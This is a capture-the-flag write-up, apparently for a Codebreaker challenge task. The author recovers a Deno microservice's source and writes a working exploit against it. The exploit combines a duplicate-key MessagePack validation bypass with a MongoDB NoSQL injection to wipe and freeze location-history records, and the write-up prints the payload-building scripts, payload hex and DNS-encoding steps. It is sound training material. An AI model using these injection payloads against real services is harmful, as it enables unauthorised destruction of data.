Points: 1200

Description

So the DNS server is an encrypted tunnel. The working hypothesis is the firmware modifications leak the GPS location of each JCTV to the APT infrastructure via DNS requests. The GA team has been hard at work reverse engineering the modified firmware and ran an offline simulation to collect the DNS requests.

The server receiving this data is accessible and hosted on a platform Cyber Command can legally target. You remember Faruq graduated from Navy ROTC and is now working at Cyber Command in a Cyber National Mission Team. His team has been authorized to target the server, but they don’t have an exploit that will accomplish the task.

Fortunately, you already have experience finding vulnerabilities and this final Co-op tour is in the NSA Vulnerability Research Center where you work with a team of expert Capabilities Development Specialists. Help NSA find a vulnerability that can be used to lessen the impact of this devastating breach! Don’t let DIRNSA down!

You have TWO outcomes to achieve with your exploit:

  1. All historic GPS coordinates for all JCTVs must be overwritten or removed. After your exploit completes, the APT cannot store the new location of any hacked JCTVs.
  2. The scope and scale of the operation that was uncovered suggests that all hacked JCTVs have been leaking their locations for some time. Luckily, no new JCTVs should be compromised before the upcoming Cyber Command operation.

Cyber Command has created a custom exploit framework for this operation. You can use the prototype “thrower.py” to test your exploit locally.

Submit an exploit program (the input file for the thrower) that can be used immediately by Cyber Command.

Downloads:

  • prototype exploit thrower (thrower.py)

Prompt:

  • exploit program used by thrower.py

Solution

Looking back at coredns from the previous task, we can note that once a message is decrypted, it's sent in a POST request to http://localhost:3000/event/insert.


This is where the microservice binary comes into play.

Running it doesn’t seem to immediately do anything, but killing it does display some logs.

root@4465386024e2:/challenge# ./microservice
{"t":"2025-01-18T08:07:30.053Z","l":"INFO","m":"Received shutdown signal, closing server..."}
{"t":"2025-01-18T08:07:30.054Z","l":"INFO","m":"Disconnected from MongoDB"}

So, we know that it's intended to interact with MongoDB. Additionally, port 3000 is commonly used by JavaScript/TypeScript applications, so we can keep that in mind going forward.

Running binwalk on the binary shows a lot of data, but most notably, a copyright string mentioning Deno is repeated over and over again.

cobra@arch:~/codebreaker/task7$ binwalk microservice
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
DECIMAL                            HEXADECIMAL                        DESCRIPTION                                                                                                                                                               
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0                                  0x0                                ELF binary, 64-bit shared object, AMD X86-64 for System-V (Unix), little endian                                       
...                                                                                                                     
8329457                            0x7F18F1                           Copyright text: "Copyright 2018-2024 the Deno authors. All rights reserved. MIT license. /// <reference path="../../" 
8480998                            0x8168E6                           Copyright text: "Copyright 2018-2024 the Deno authors. All rights reserved. MIT license. // @ts-check /// <reference" 
8550312                            0x8277A8                           Copyright text: "Copyright 2018-2024 the Deno authors. All rights reserved. MIT license. // @ts-check /// <reference" 
8552082                            0x827E92                           Copyright text: "Copyright 2018-2024 the Deno authors. All rights reserved. MIT license. // @ts-check /// <reference" 
8765500                            0x85C03C                           Copyright text: "Copyright 2018-2024 the Deno authors. All rights reserved. MIT license. // @ts-check /// <reference" 
8785101                            0x860CCD                           Copyright text: "Copyright 2018-2024 the Deno authors. All rights reserved. MIT license. // @ts-check /// <reference" 
8801544                            0x864D08                           Copyright text: "Copyright 2018-2024 the Deno authors. All rights reserved. MIT license. /// <reference path="../../" 
8828650                            0x86B6EA                           Copyright text: "Copyright 2018-2024 the Deno authors. All rights reserved. MIT license. import { primordials } from" 
8855578                            0x87201A                           Copyright text: "Copyright 2018-2024 the Deno authors. All rights reserved. MIT license. // @ts-check /// <reference" 
...

Deno is a JavaScript runtime created by the creator of Node. Given the large number of copyright strings in the binary’s data, it is most likely a compiled Deno web application.

Although there aren’t any automated decompilation tools for these binaries, this Reddit thread provides a general direction.

AFAIK Deno simply concats the JS bundle at the end of the Deno exe file which it extracts at runtime.

So, we can just iterate through all the sections with the string “Deno” in them and output them to files that we can dig through to try and find the source code.

We can use a Python script to automate this process.

import os
import subprocess

input_file = 'microservice'
output_dir = './extracted/'
file_size = os.path.getsize(input_file)  # 95253887 for this binary

def run_binwalk(input_file):
    return subprocess.check_output(['binwalk', input_file], text=True)

def parse_binwalk_output(binwalk_output):
    # skip binwalk's header and trailer lines, then split each row into
    # (decimal offset, hex offset, description)
    sections = []
    lines = binwalk_output.split('\n')[5:-4]

    for line in lines:
        start_offset, _, description = line.split(None, 2)
        sections.append((int(start_offset), description))

    return sections

def extract_sections(input_file, sections):
    os.makedirs(output_dir, exist_ok=True)

    for i, (start_offset, description) in enumerate(sections):
        output_file = f"{output_dir}section{i + 1}"

        if "Deno" in description:
            # each section runs until the next binwalk hit (or the end of the file)
            if i == len(sections) - 1:
                size = file_size - start_offset
            else:
                size = sections[i + 1][0] - start_offset

            dd_command = [
                'dd', 
                f'if={input_file}', 
                f'of={output_file}', 
                'bs=1', 
                f'skip={start_offset}', 
                f'count={size}'
            ]
            
            subprocess.run(dd_command, check=True)
            print(f"Extracted section {i + 1}: to {output_file}")

binwalk_output = run_binwalk(input_file)
sections = parse_binwalk_output(binwalk_output)
extract_sections(input_file, sections)
Running the script carves each matching section out of the binary with dd.

cobra@arch:~/codebreaker/task7$ python extract.py  
2601186+0 records in                                       
2601186+0 records out                           
2601186 bytes (2.6 MB, 2.5 MiB) copied, 7.61418 s, 342 kB/s
Extracted section 7: to ./extracted/section7    
151541+0 records in
151541+0 records out
151541 bytes (152 kB, 148 KiB) copied, 0.452262 s, 335 kB/s
...

Looking at the extracted files, most of them contain JavaScript, but there’s a lot of other data as well. Since we’ve run the binary and know some of the strings it produces, we can search for those to try to locate the source code.

cobra@arch:~/codebreaker/task7$ grep "Received shutdown signal" extracted/*  
grep: extracted/section212: binary file matches

So, we know the source code must be in section212. Parsing through it, we can find the string as well as some source code hidden in a bunch of JSON data at the end of the section.


Although the JSON data is incomplete and some of it overlaps into section213, we can copy what we have so far into a file and pass it into jq to start extracting source code.

cobra@arch:~/codebreaker/task7$ cat extracted.json | jq .

We can immediately see the content of index.ts and the directory structure, which we can mirror.

{
  "version": 3,
  "sources": [
    "file:///work/src/index.ts"
  ],
  "sourcesContent": [
    "console.debug = () => {} // stop debug logging for main app\n\nimport http from 'node:http';\n// @deno-types=\"npm:@types/express\"\nimport express from 'npm:express';\n// @deno-types=\"npm:@types/body-parser\"\nimport bodyParser from 
...

This is followed by mongodb.ts and logger.ts. However, looking at the imports in index.ts, we can see that we are missing routes.ts. So, we need to pull some of the JSON from the next section to find its source code.

Doing a quick search, we can find it and add it to our mirrored directory structure.

Each of these files needs to be formatted to fix newlines and escaped backslashes.
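
This cleanup can be scripted. Here’s a minimal sketch, assuming the recovered source map has been trimmed into valid JSON as extracted.json; JSON.parse handles the \n and \\ unescaping for us:

const fs = require('fs');
const path = require('path');

// the source map's "sources" and "sourcesContent" arrays line up index-for-index
const map = JSON.parse(fs.readFileSync('extracted.json', 'utf8'));

map.sources.forEach((src, i) => {
  const rel = src.replace('file:///', ''); // e.g. work/src/index.ts
  fs.mkdirSync(path.dirname(rel), { recursive: true });
  fs.writeFileSync(rel, map.sourcesContent[i]);
});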

We now have the source code (including comments) for the microservice application.

Looking through the functions, we can now see what endpoints it’s listening on, including the /event/insert endpoint from the coredns binary.

export function registerRoutes(app: Application) {
    app.post("/event/insert", async (req: Request, res: Response) => {
        try {
            const event = validateLocationEvent(req)
            await insertLocationEvent(event);
            res.status(200).send("Event inserted successfully");
        } catch (error) {
            res.status(500).send("Error inserting event: " + error);
        }
    });

    app.post("/event/test", async (req: Request, res: Response) => {
        try {
            const event: LocationEvent = {
                vid: "o-00-000",
                timestamp: (new Date()).getTime(),
                point: {
                    type: "Point",
                    coordinates: [0, 0] // visiting null island
                }
            };
            await insertLocationEvent(event);
            res.status(200).send("Event inserted successfully");
        } catch (error) {
            res.status(500).send("Error inserting event: " + error);
        }
    });
}

In order to get the source code running, we first need to install MongoDB and then install Deno.

Once everything is installed, we can start MongoDB and run the source code with Deno.

root@4465386024e2:/challenge/work/src# mongod
root@4465386024e2:/challenge/work/src# deno run --allow-net --allow-sys --allow-read --allow-env index.ts

Unfortunately, we get an error when trying to run the Deno application.

error: Unknown export './asserts' for '@std/[email protected]'.

This is just an import issue caused by naming changes in the standard library. We can fix it by changing the first line of routes.ts to the following.

import { assert } from "jsr:@std/assert"

Now the microservice source code runs successfully and connects to MongoDB.

root@4465386024e2:/challenge/work/src# deno run --allow-net --allow-sys --allow-read --allow-env index.ts
{"t":"2025-01-18T08:58:21.890Z","l":"INFO","m":"Connected to MongoDB"}
{"t":"2025-01-18T08:58:21.935Z","l":"INFO","m":"Server is running on port 3000"}

Looking around the source code at this point, the entire purpose of the microservice is to track location events in the database after receiving them from coredns. We just need to find a flaw in the way it loads these events so we can remove all past events and stop the application from functioning in the future.

First, let’s get a general idea of how it works and how to interact with it.

We already looked at the insert and test endpoints above. We don’t need to worry about test since it’s not called by coredns. Looking at insert, the incoming location event is first validated and then inserted into the database.

The validation shows us how the incoming requests are expected to be formatted.

export function validateLocationEvent(req: Request): LocationEvent {
  const buffer = req.body

  // fast checks

  assert(buffer[0] == 0x84) // must be object with 4 keys (v, t, d, m)
  assert(buffer[1] == 0xA1 && buffer[2] == 0x76) // first key is 'v'
  assert(buffer[3] == 0xA8 && buffer[4] == 0x6f) // vids are 8 character strings starting with o

  // slower msgpack decode and other validation

  const msg = msgpack.decode(buffer); // throws on bad decode

  let vid: string = msg.v // already checked above
  assert(vid) // fail fast
  let timestamp: number = msg.t // too old/new checked on event insert
  assert(timestamp) // fail fast

  // translate & check coordinates from msg.d (bias-packed degrees) and msg.m (bit-packed milliseconds)
  // convert to D.DDDDDD accuracy at least 0.000017 or approx 2 meters
  let lat_ms = (msg.m >> 16) & 0xFFFF
  let lon_ms = msg.m & 0xFFFF
  let lat_s = lat_ms / 1000
  let lon_s = lon_ms / 1000
  let lat_df = lat_s / 60
  let lon_df = lon_s / 60
  let lat_di = Math.trunc(msg.d / 361)
  let lon_di = (msg.d % 361)
  let lat: number = unbias(lat_di, lat_df, 90)
  let lon: number = unbias(lon_di, lon_df, 180)
  assert(-90 <= lat && lat <= 90) // latitude range check.  range is [-90, 90]
  assert(-180 <= lon && lon <= 180) // longitude range check. range is [-180, 180]
  assert(!(lat == 0 && lon == 0)) // avoid bogus coordinates (null island)

  const event: LocationEvent = {
      vid: vid,
      timestamp: timestamp,
      point: {
          type: "Point",
          coordinates: [lon, lat] // GeoJSON Point expects longitude first
      }
  }

  return event
}

We basically need to supply an object with a vehicle ID, timestamp, and latitude/longitude data. This object needs to be encoded with MessagePack so that the data format can be strictly controlled. Once the data is decoded from its MessagePack form and verified, it’s placed into a new LocationEvent object, which can be inserted into the database with insertLocationEvent.

export async function insertLocationEvent(event: LocationEvent, force: boolean = false) {
    if (!force) { // force bypass for testing
        const currentTime = new Date();

        if (Math.abs(currentTime.getTime() - event.timestamp) > CLOCK_THRESH) {
            throw new Error("Event timestamp is not within range of the current time");
        }
    }

    let doc = { _id: new ObjectId(), ...event }; // force new id to avoid duplicate key error on fast insertions
    await locationEvents.insertOne(doc)
}

We can also see an additional check here to verify that the timestamp is within a certain threshold of the current time.

On each maintenance interval, the server also aggregates all the location events into a location history collection to group and organize events for the same vehicles.

connectToDatabase(uri, db).then(() => {
    server = app.listen(port, () => {
        logger.info(`Server is running on port ${port}`);
    });
    setInterval(async () => {
        try {
            await aggregateLocationEvents();
            logger.info('Maintenance task completed');
        } catch (err) {
            logger.error('Failed to run maintenance task', err);
        }
    }, maintenanceInterval);
}).catch(async (err) => {
    logger.error('Failed to connect to the database', err);
    await closeDatabaseConnection();
    Deno.exit(1);
});

There’s also a lot of other stuff going on with the location event aggregation, but we will revisit it later.

For now, we know enough to properly communicate with the server. We just need to create an object with the format it’s expecting, encode it with MessagePack, and send it in a POST request.

I opted to use Node for this instead of Deno since I have more familiarity with it. I also just set d and m to 0. There’s a lot of math behind these values (the bias-packed degrees and bit-packed milliseconds), but that’s not important to us; setting them to 0 will give us the coordinates [1, 1].

const msgpack = require('msgpack-lite');

let event = {
  v: "o-00-000",
  t: (new Date()).getTime(),
  d: 0,
  m: 0
}

const buffer = msgpack.encode(event)

fetch('http://127.0.0.1:3000/event/insert', {
  method: 'POST',
  body: buffer,
  headers: {
    'Content-Type': 'application/msgpack'
  }
})

Running our script immediately places the event in the location_events collection.

root@229e90ffa6e4:/challenge/send# node send.js
root@229e90ffa6e4:/# mongosh
test> db.location_events.find()
[
  {
    _id: ObjectId('678c428ece7bba36a8738034'),
    vid: 'o-00-000',
    timestamp: 1737245326517,
    point: { type: 'Point', coordinates: [ 1, 1 ] }
  }
]

As the maintenance interval passes and we send multiple events, we can see the events aggregated by vehicle ID in the location_history collection.

test> db.location_history.find()
[
  {
    _id: ObjectId('678c0d62ce7bba36a8738030'),
    vid: 'o-00-000',
    count: 2,
    starttime: 1737231713970,
    endtime: 1737231814027,
    timestamps: [ 1737231713970, 1737231814027 ],
    lineString: { type: 'LineString', coordinates: [ [ 1, 1 ], [ 1, 1 ] ] }
  }
]

Now that we can communicate with the server, we can start looking for vulnerabilities and ways to abuse the code.

The first thing that stands out in validateLocationEvent is the set of fast checks verifying raw bytes in the MessagePack data.

// fast checks

assert(buffer[0] == 0x84) // must be object with 4 keys (v, t, d, m)
assert(buffer[1] == 0xA1 && buffer[2] == 0x76) // first key is 'v'
assert(buffer[3] == 0xA8 && buffer[4] == 0x6f) // vids are 8 character strings starting with o

// slower msgpack decode and other validation

const msg = msgpack.decode(buffer); // throws on bad decode

There are a few interesting things here about how the buffer is parsed, leading to potential vulnerabilities.

First, the only specific key that is explicitly checked for is v, so we can change the names of the other keys as long as they don’t cause the later validation to fail.

Second, there are a lot of restrictions on the provided vehicle ID v. However, with some testing, we can quickly find that if the MessagePack decoder receives a buffer containing the same key twice, it keeps the value from the second one. This means we can put normal data in the first v and then add a second v to the end with whatever we want.
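
We can confirm this decoder behavior by hand-crafting a map that contains the key v twice (a quick test with msgpack-lite):

const msgpack = require('msgpack-lite');

// fixmap with 2 entries, both keyed 'v': {v: "first", v: "second"}
const dup = Buffer.concat([
  Buffer.from([0x82]),                                 // map, 2 entries
  Buffer.from([0xa1, 0x76]), msgpack.encode('first'),  // 'v' -> "first"
  Buffer.from([0xa1, 0x76]), msgpack.encode('second'), // 'v' -> "second"
]);

console.log(msgpack.decode(dup)); // { v: 'second' } -- the later value wins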

The immediate flaw with the second potential vulnerability is that we are only allowed to have 4 keys. However, as mentioned with the first issue, we aren’t necessarily required to have t, d, and m, as long as we have 4 keys. So, if we can replace one of these with a second v, we can successfully bypass the filter.

Let’s see if we can leave any of these variables out and still succeed with validation.

Both v and t are actually run through assertions, so they can’t be equal to undefined without making the validation fail.

let vid: string = msg.v // already checked above
assert(vid) // fail fast
let timestamp: number = msg.t // too old/new checked on event insert
assert(timestamp) // fail fast
We can confirm this in the Node REPL.

╭─cobra@arch ~ 
╰─$ node
> assert(undefined)
Uncaught AssertionError [ERR_ASSERTION]: undefined == true
...

Notably, however, the string and number type annotations on these variables are meaningless except at compile time. When the TypeScript code is compiled, all type checking goes away since the code becomes JavaScript. This means we don’t need to worry about ensuring both of these values are the correct type, as long as nothing else blocks their types later on.
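
For example, after compilation the annotated declarations become plain JavaScript assignments, so any runtime value flows through:

let vid = msg.v;       // was: let vid: string = msg.v
let timestamp = msg.t; // was: let timestamp: number = msg.t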

Continuing on, we can see where m and d are parsed into the latitude and longitude.

let lat_ms = (msg.m >> 16) & 0xFFFF
let lon_ms = msg.m & 0xFFFF
let lat_s = lat_ms / 1000
let lon_s = lon_ms / 1000
let lat_df = lat_s / 60
let lon_df = lon_s / 60
let lat_di = Math.trunc(msg.d / 361)
let lon_di = (msg.d % 361)
let lat: number = unbias(lat_di, lat_df, 90)
let lon: number = unbias(lon_di, lon_df, 180)
assert(-90 <= lat && lat <= 90) // latitude range check.  range is [-90, 90]
assert(-180 <= lon && lon <= 180) // longitude range check. range is [-180, 180]
assert(!(lat == 0 && lon == 0)) // avoid bogus coordinates (null island)

Because m is passed only into bitwise operations, if m is undefined, both lat_ms and lon_ms will simply become 0. JavaScript coerces the operands of bitwise operations to 32-bit integers, and undefined coerces to NaN, which becomes 0.

> (undefined >> 16) & 0xFFFF
0
> undefined & 0xFFFF
0

Luckily, lat_ms and lon_ms being 0 is valid, allowing the validation to succeed without m being provided. This means we can replace m with an arbitrary second v in our buffer, which will be parsed instead of the first v.

To do this, we need to construct our buffer semi-manually. If we only used the MessagePack encoder, the duplicate keys would be resolved before the buffer is ever produced, because a JavaScript object can’t hold the same key twice.
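
We can see this in the Node REPL; the object literal itself drops the duplicate before the encoder ever sees it:

> ({v: "a", v: "b"})
{ v: 'b' }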

const msgpack = require('msgpack-lite');

let bytes = []
bytes.push(0x84) 
bytes.push(0xA1)
bytes.push("v".charCodeAt(0))
bytes.push(...msgpack.encode("o-00-000"))
bytes.push(0xA1)
bytes.push("t".charCodeAt(0))
bytes.push(...msgpack.encode(new Date().getTime()))
bytes.push(0xA1)
bytes.push("d".charCodeAt(0))
bytes.push(0)
bytes.push(0xA1)
bytes.push("v".charCodeAt(0))
bytes.push(...msgpack.encode("not 8 characters long"))

let buffer = new Uint8Array(bytes)

fetch('http://127.0.0.1:3000/event/insert', {
  method: 'POST',
  body: buffer,
  headers: {
    'Content-Type': 'application/msgpack'
  }
})

Running our script successfully bypasses the vehicle ID restrictions.

root@229e90ffa6e4:/challenge/send# node send.js
test> db.location_events.find()
[
  {
    _id: ObjectId('678c4f55ce7bba36a8738036'),
    vid: 'not 8 characters long',
    timestamp: 1737248597433,
    point: { type: 'Point', coordinates: [ 1, 1 ] }
  }
]

As mentioned previously, the type annotations for vid and timestamp are meaningless because the TypeScript is compiled. This not only means we can make vid more than 8 characters long, but also that we can set it to any type we want. However, doing this with the timestamp variable presents an additional obstacle: each timestamp is checked to make sure that it is close to the current time.

const currentTime = new Date();  

if (Math.abs(currentTime.getTime() - event.timestamp) > CLOCK_THRESH) {
    throw new Error("Event timestamp is not within range of the current time");
}

However, this actually is not an issue for us because of the way JavaScript types compare and evaluate.

If we subtract a non-number from a number, we get NaN. The absolute value of NaN is once again NaN, and any comparison where one of the values is NaN returns false, so the error will not be thrown.

> Math.abs(1234 - "asdf") > 0
false

So, we can effectively set timestamp and vid to almost whatever we want. We just need to figure out how we can abuse this. Given we’re interacting with MongoDB, let’s look for NoSQL injection.

There are a lot of interesting things going on in aggregateLocationEvents, which is responsible for grouping events with the same vehicle ID together.

export async function aggregateLocationEvents() {
    const pipeline: any[] = [
        {
            $sort: { vid: 1, timestamp: 1 } // so groups have entries ordered by time (optimized with index)
        },
        {
            $group: {
                _id: "$vid", // group on vid (orderd by timestamp above)
                last_id: { $max: "$_id" }, // track latest entered event to avoid race condition and delete only the aggregated events
                starttime: { $min: "$timestamp" },
                endtime: { $max: "$timestamp" },
                timestamps: { $push: "$timestamp" },
                coords: { $push: "$point.coordinates" }
            }
        },
        {
            $project: {
                location_history: {
                _id: "$last_id",
                vid: "$_id",
                count: { $size: "$timestamps" },
                starttime: "$starttime",
                endtime: "$endtime",
                timestamps: "$timestamps",
                lineString: {
                    type: "LineString",
                    coordinates: "$coords"
                }
                }
            }
        }
    ];

    interface LocationResult {
        location_history: WithId<LocationHistory>;
    }

    const aggregatedResults: Array<LocationResult> = await locationEvents.aggregate(pipeline).toArray() as Array<LocationResult>;

    if (aggregatedResults.length == 0) return;

    const MAX_COUNT = 100; // max events in a single LocationHistory to avoid Mongo errors

    var bulk = locationHistory.initializeUnorderedBulkOp();
    var last_id = new ObjectId(0);

    for (var result of aggregatedResults) {
        let h = result.location_history;
        if (h._id > last_id) last_id = h._id; // keep the last id across all groups

        let last_history_selector: Filter<LocationHistory>  = { vid: h.vid };
        let last_history = (await locationHistory.find(last_history_selector).sort({ endtime: -1 }).limit(1).toArray()).shift();

        if (last_history == null) { // must be a new vid
            let histories = paginate(h, MAX_COUNT, 0);
            for (var newh of histories) {
                await bulk.insert(newh);
            }
        } else { // existing vid
            last_history_selector.endtime = last_history.endtime; // now we can select the correct history to extend

            if ( h.starttime >= last_history.endtime ) { // typical case
                let histories = paginate(h, MAX_COUNT, last_history.count);
                let extra = histories.shift()!;

                // update last history up to the MAX_COUNT locations
                last_history.count += extra.count;
                last_history.endtime = extra.endtime;
                last_history.timestamps.push(...extra.timestamps);
                last_history.lineString.coordinates.push(...extra.lineString.coordinates);

                await bulk.find(last_history_selector).update({ $set: {
                    count: last_history.count,
                    endtime: last_history.endtime,
                    timestamps: last_history.timestamps,
                    lineString: last_history.lineString
                }});

                // add complete additional history entries over MAX_COUNT
                for (var newh of histories) {
                    await bulk.insert(h);
                }

            } else { // unlikely but maybe possible out of order case:  h.starttime < last_history.endtime
            // just drop it since we already have a newer location, maybe implement later
            //throw new Error("todo");
            }
        }
    }

    try { 
        await bulk.execute();
    } catch (e) { // catch for the empty batch edge case
        if (e instanceof MongoInvalidArgumentError) {
            // MongoInvalidArgumentError: Invalid BulkOperation, Batch cannot be empty
            logger.debug("handled exception in aggregateLocationEvents", e);
        } else {
            logger.error("unhandled exception in aggregateLocationEvents", e);
        }
    }

    // clear the locationEvents collection after aggregation up to and including the last_id
    await locationEvents.deleteMany({ _id: { $lte: last_id } });
}

This line is vulnerable to NoSQL injection.

let last_history_selector: Filter<LocationHistory>  = { vid: h.vid };

If we set h.vid to an object containing additional query syntax, we can control what the query matches. For example, we can set h.vid to {"$ne": ""}, which will cause last_history_selector to select every vehicle ID that isn’t empty, which should be all of them.
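
To illustrate in mongosh (using the collection names from the source):

test> db.location_history.find({ vid: { $ne: "" } }) // no vid equals "", so this matches every history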

There is also a second place where NoSQL injection is possible. When last_history is not null, the last_history_selector endtime is updated to match the endtime of the last history. So, if the last history’s endtime were equal to {"$ne": ""}, the selector would be updated to match every endtime that isn’t empty, which is, once again, all of them.

last_history_selector.endtime = last_history.endtime; // now we can select the correct history to extend

Combining these injections, we can devise a series of steps to not only remove past history, but also prevent future history from being aggregated.

First, we send a payload with a timestamp of {"$ne": ""} and a unique vehicle ID like “asdf” which won’t be in the database since it’s invalid. We then wait for it to aggregate into the location_history collection.

Since there’s no previous history for this vehicle ID, last_history will be null, and the event will be inserted into the history collection fresh, but with a malicious timestamp. Since there’s only one timestamp, starttime and endtime are also set to the value of the malicious timestamp.

Second, we send a payload with a timestamp of {"$ne": ""} and a vehicle ID of {"$ne": ""}. Again, we wait for it to aggregate into the location_history collection. Because the vehicle ID abuses the NoSQL injection, last_history_selector will match every vehicle. However, the line below picks the history from this set with the latest endtime.

let last_history = (await locationHistory.find(last_history_selector).sort({ endtime: -1 }).limit(1).toArray()).shift();

This actually isn’t an issue for us. When MongoDB compares BSON values of different types, it uses a fixed type ordering (numbers sort below strings, which sort below objects), which guarantees that objects will always be greater than numbers. Since the history document we created in the first step has an object endtime, it will be greater than all the other endtimes, and last_history will be assigned to it.
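
We can sanity-check this ordering in mongosh with a throwaway collection (assuming a MongoDB version that permits storing $-prefixed field names, which the exploit relies on anyway):

test> db.ordertest.insertMany([{ endtime: 1737231814027 }, { endtime: { "$ne": "" } }])
test> db.ordertest.find().sort({ endtime: -1 }).limit(1)
[ { _id: ObjectId('...'), endtime: { '$ne': '' } } ]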

Because last_history isn’t null, the last_history_selector endtime will be set to the endtime of last_history, which contains our NoSQL injection from the first step. We will then enter the “typical case”: our history event’s starttime and the last history event’s endtime are both our injected object, and JavaScript’s >= comparison between them succeeds.

if ( h.starttime >= last_history.endtime ) { // typical case
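
In the Node REPL, we can see why this check passes; both objects coerce to the string "[object Object]", so the comparison succeeds:

> ({"$ne": ""}) >= ({"$ne": ""})
true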

In this case, the code will update the history chosen by last_history_selector. However, because of our NoSQL injection, this will not just match the last history as expected, but every history document in the collection. It will then update them all with the data from last_history, which has just been extended with our second payload’s data, meaning our injected endtime will overwrite every single history document in the collection.

await bulk.find(last_history_selector).update({ $set: {
    count: last_history.count,
    endtime: last_history.endtime,
    timestamps: last_history.timestamps,
    lineString: last_history.lineString
}});

Our payloads have now achieved outcome number 1.

For outcome number 2, we need to prevent any new history from being aggregated. Our payloads actually achieve this as well.

After the APT sends new events, these events will eventually be aggregated into histories. However, since we wrote over all the previous histories with our injected data, every document in the location_history collection now has an endtime of {"$ne": ""}. When a new event’s last_history_selector is created from its vid, it will find that vehicle’s existing history (per the scenario, no new JCTVs will appear, so every incoming vid already has one), and that history’s endtime is now an object. Because the new events are valid and have normal numeric starttimes, the “typical case” check fails: in JavaScript, comparing a number against an object comes back false, since the object coerces to NaN in the numeric comparison. This puts us into the second case, where the aggregation is dropped.
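
Again, the Node REPL shows the comparison that fails for any legitimate event:

> 1737231814027 >= ({"$ne": ""})
false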

} else { // unlikely but maybe possible out of order case:  h.starttime < last_history.endtime
        // just drop it since we already have a newer location, maybe implement later
        //throw new Error("todo");
}

As a result, all future aggregations will fail, and the events will be cleared, never to be seen again.

// clear the locationEvents collection after aggregation up to and including the last_id
await locationEvents.deleteMany({ _id: { $lte: last_id } });

We can update our script from before to perform the exploit locally and make sure it works. Note that the commented-out byte push needs to replace the last byte push for the second payload.

const msgpack = require('msgpack-lite');

let bytes = []
bytes.push(0x84) 
bytes.push(0xA1)
bytes.push("v".charCodeAt(0))
bytes.push(...msgpack.encode("o-00-000"))
bytes.push(0xA1)
bytes.push("t".charCodeAt(0))
bytes.push(...msgpack.encode({"$ne": ""}))
bytes.push(0xA1)
bytes.push("d".charCodeAt(0))
bytes.push(0)
bytes.push(0xA1)
bytes.push("v".charCodeAt(0))
bytes.push(...msgpack.encode("asdf"))
// bytes.push(...msgpack.encode({"$ne": ""}))

let buffer = new Uint8Array(bytes)

fetch('http://127.0.0.1:3000/event/insert', {
  method: 'POST',
  body: buffer,
  headers: {
    'Content-Type': 'application/msgpack'
  }
})

After confirming the steps work locally, we can output the payload data for use with thrower.py.

const msgpack = require('msgpack-lite')

let bytes1 = []
bytes1.push(0x84) 
bytes1.push(0xA1)
bytes1.push('v'.charCodeAt(0))
bytes1.push(...msgpack.encode('o-00-000'))
bytes1.push(0xA1)
bytes1.push('t'.charCodeAt(0))
bytes1.push(...msgpack.encode({'$ne': ''}))
bytes1.push(0xA1)
bytes1.push('d'.charCodeAt(0))
bytes1.push(0)
bytes1.push(0xA1)
bytes1.push('v'.charCodeAt(0))
bytes1.push(...msgpack.encode('asdf'))

let buffer1 = Buffer.from(bytes1)
console.log('Buffer 1:', buffer1.toString('hex'))

let bytes2 = []
bytes2.push(0x84) 
bytes2.push(0xA1)
bytes2.push('v'.charCodeAt(0))
bytes2.push(...msgpack.encode('o-00-000'))
bytes2.push(0xA1)
bytes2.push('t'.charCodeAt(0))
bytes2.push(...msgpack.encode({'$ne': ''}))
bytes2.push(0xA1)
bytes2.push('d'.charCodeAt(0))
bytes2.push(0)
bytes2.push(0xA1)
bytes2.push('v'.charCodeAt(0))
bytes2.push(...msgpack.encode({'$ne': ''}))

let buffer2 = Buffer.from(bytes2)
console.log('Buffer 2:', buffer2.toString('hex'))
Running this gives us the hex for both payloads.

root@229e90ffa6e4:/challenge/send# node generate.js
Buffer 1: 84a176a86f2d30302d303030a17481a3246e65a0a16400a176a461736466
Buffer 2: 84a176a86f2d30302d303030a17481a3246e65a0a16400a17681a3246e65a0

We need to encrypt each of these payloads and then encode them like we did in Task 6. I updated the scripts from before to simplify this process.

// updated excerpt from the Task 6 encrypt script; encrypt() and the imports are unchanged
func main() {
	sharedKey, _ := hex.DecodeString("c59a6a561c3b1692b0db545e0088020a52486e0f610604fc5c154ccf267fc59c")
	associatedData, _ := hex.DecodeString("bfca79b7ab03ed8e804af32a52133ed2f12b3380ddda4a6734cdd7227d73101a")

	var input string
	fmt.Print("Enter message hex: ")
	fmt.Scanln(&input)
	message, _ := hex.DecodeString(input)
	encryptedMessage := encrypt([32]byte(sharedKey), uint64(0), associatedData[:], message)

	fmt.Printf("Encrypted message: %x\n", encryptedMessage)
}
And the matching update to the Task 6 encoder (the imports and mapping are unchanged):

public_key = bytes.fromhex('8a7fdede087b2fc93adf90d7fe75a51a10223a406deeef63fdd9a40847535377')

message = public_key + bytes.fromhex(input('Enter hex: '))
b32_message = base64.b32encode(message).decode('utf-8')

if len(b32_message) > 186:
    exit('Message too long!')

enc_message = ''.join([mapping[x] for x in b32_message])

if len(enc_message) < 186:
    diff = 186 - len(enc_message)
    enc_message += 'x' * diff

print(f'x{enc_message[0:62]}.x{enc_message[62:124]}.x{enc_message[124:]}.net-vwit67xv.example.com.')

Combining these scripts with the payloads gives us the domain names we need.

root@229e90ffa6e4:/challenge# go run encrypt.go 
Enter message hex: 84a176a86f2d30302d303030a17481a3246e65a0a16400a176a461736466
Encrypted message: f6a153b5bc2b6b3ca7c1e0396fba5821a32eef644798430fb3b6ad15004700338474e68b47af4ef99bacfc520c8a
root@229e90ffa6e4:/challenge# go run encrypt.go
Enter message hex: 84a176a86f2d30302d303030a17481a3246e65a0a16400a17681a3246e65a0
Encrypted message: f6a153b5bc2b6b3ca7c1e0396fba5821a32eef644798430fb3936f420a44a2295b3550e5fca595530d6d198d379b27
root@229e90ffa6e4:/challenge# python3 encode.py
Enter hex: f6a153b5bc2b6b3ca7c1e0396fba5821a32eef644798430fb3b6ad15004700338474e68b47af4ef99bacfc520c8a
xH9VTTNG8FCNSIEMVI3BVSTD538824EI0DNNEUOVTR6I0GHQJADRVD8AJMMU2MQ.xPSKV0U0EBFN9C238PETTI4F6231UPRDB8L013G0CS4EJJ8MHTF9RSPNB7SA868.xKzzzxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.net-vwit67xv.example.com.
root@229e90ffa6e4:/challenge# python3 encode.py
Enter hex: f6a153b5bc2b6b3ca7c1e0396fba5821a32eef644798430fb3936f420a44a2295b3550e5fca595530d6d198d379b27
